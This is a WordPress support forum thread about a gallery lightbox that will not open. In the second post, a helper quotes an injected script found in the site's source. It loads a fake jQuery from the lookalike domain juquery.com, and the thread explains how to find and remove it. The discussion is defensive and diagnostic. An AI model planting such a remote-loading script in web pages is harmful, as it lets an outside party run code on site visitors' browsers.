WordPress.org

Ready to get started?Download WordPress

Forums

NextGEN Gallery
Lightbox not opening (5 posts)

  1. scottamayer
    Member
    Posted 1 year ago #

    Having a problem. Plugin works fine locally but when I livened it up the lightbox does not work when images are clicked from within the gallery. See here at the demo site. Must be something simple I am overlooking.
    http://www.scottamayer.com/amelia/gallery/

    Cheers in advance

    http://wordpress.org/extend/plugins/nextgen-gallery/

  2. smigliorato
    Member
    Posted 1 year ago #

    I am hazarding a guess, but jquery (if my numbers are right) is being loaded at least 3 times.

    **WARNING**
    The bit of code below downloads from juquery.com not jquery.com. There is a very good chance that it is doing something nasty. It may be adding links to your site, or worse.
    I would remove it immediately. It may be associated with the ubermenu plugin, if you happen to use it.

    Further research reveals there to actually be nothing there at this time, but I would get rid of it in case that changes.

    This is no good:

    <script type="text/javascript">if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.juquery.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.juquery.com/jquery.js"></scr'+'ipt>'); } </script>

    Here are your two versions
    Including two, which may be different versions, can cause problems. This is usually the result of a plugin or theme.

    There is the standard from wordpress:

    <script type='text/javascript' src='http://www.scottamayer.com/amelia/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script>

    One from esaudioplayer:

    <script type="text/javascript" src="http://www.scottamayer.com/amelia/wp-content/plugins/esaudioplayer/jquery.base64.min.js"></script>

    I would try to pair that down to one and see if that doesn't help out.

    Best bet is to comment all out but one
    put <!-- before it and --> after
    To see if you get one to work.

    Let me know if you need any help and if that works (and nothing else breaks).

    Just a (hopefully helpful) note:

    Cufon isn't necessary anymore with things like

    This should speed up the site and remove some unnecessary code.

  3. scottamayer
    Member
    Posted 1 year ago #

    I agree that first bit looks bad. I am having trouble locating where it comes from. My theme and the Calendar Plugin are both bought. The gallery and Audio player are both free. Any pointers on where to look would be appreciated.

    Cheers
    Scott

  4. I agree that first bit looks bad. I am having trouble locating where it comes from. My theme and the Calendar Plugin are both bought.

    The bit of code below downloads from juquery.com not jquery.com. There is a very good chance that it is doing something nasty

    That fake jquery library loading is annoying and doing something nasty.

    If you've got that either your site is compromised (hacked) or you're using a dodgy piece of software where the people who copied that software inserted Very Bad Things™.

    Either one is not good. ;) If it's a "free" copy of a commercial plugin or theme then lose that theme and delouse your installation for back doors.

    If it's just a hack then you need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

    Good luck.

  5. smigliorato
    Member
    Posted 1 year ago #

    According to my calculations, nothing exists at the address anymore. I used jsunpack to check it. That tool is designed to outwit those kind of suspect scripts so you can see what they are actually doing. I wasn't able to find anything.

    --I am adding this in after I've written the rest. I am not ready to say you are hacked quite yet. I think either a plugin or theme is probably to blame. My reasoning and resources about others with the exact code are below--

    Look in these places:

    • header.php - You can access this from the WordPress appearance editor. ctrl-f and you can use browser search to look for juquery
    • If its not there, try disabling all plugins to see if it disappears. Re-enable one by one to find the offending plugin.

    Thats the basics.

    I think this is probably a naughty plugin or theme. Is the theme free? What plugins and where did you get them?

    Here are some links to people with the exact same problem:

    Thread #1
    Someone had a problem with juquery, but even though they fixed it, they didn't post where they found it. Someone else says it had something to do with a bug in the ubermenu plugin.

    Thread #2
    They mention something about the theme being suspect. common.php may be another file to check. It also links an article (that I include below) that describes a similar problem. It also mentions ubermenu, and ubermenu.php in particular. I don't know if ubermenu itself is bad, or if it was hacked in some way.

    --edit--Uber Menu looks to be a legit plugin? Just to confirm, do you use this plugin?--edit--

    An article about a similar trick
    In this case, the file was loaded from j-query.org. Same general idea though. An individual took over several orphaned plugins and inserted the jquery impostor. In his case, it was used to insert links to site he was trying to promote.

    Below is a way to search all of the wordpress file you have at once, for "juquery", but it takes a bit of work.

    **There is a chance that wherever the code is getting entered is obfuscated in some way, making these steps semi-useless.**

    You can download all of your sites files via ftp and find a way to search them (you will need to search full text). You can enable windows to do this or use something like AstroGrep.

    A more advanced move would be to get shell access (if your host allows it, you might have to ask) and use grep (it should come standard in linux) on the host to search for the file :

    Example, navigate to your wordpress directory:
    grep -r juquery

    That assumes a linux/apache host of course.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags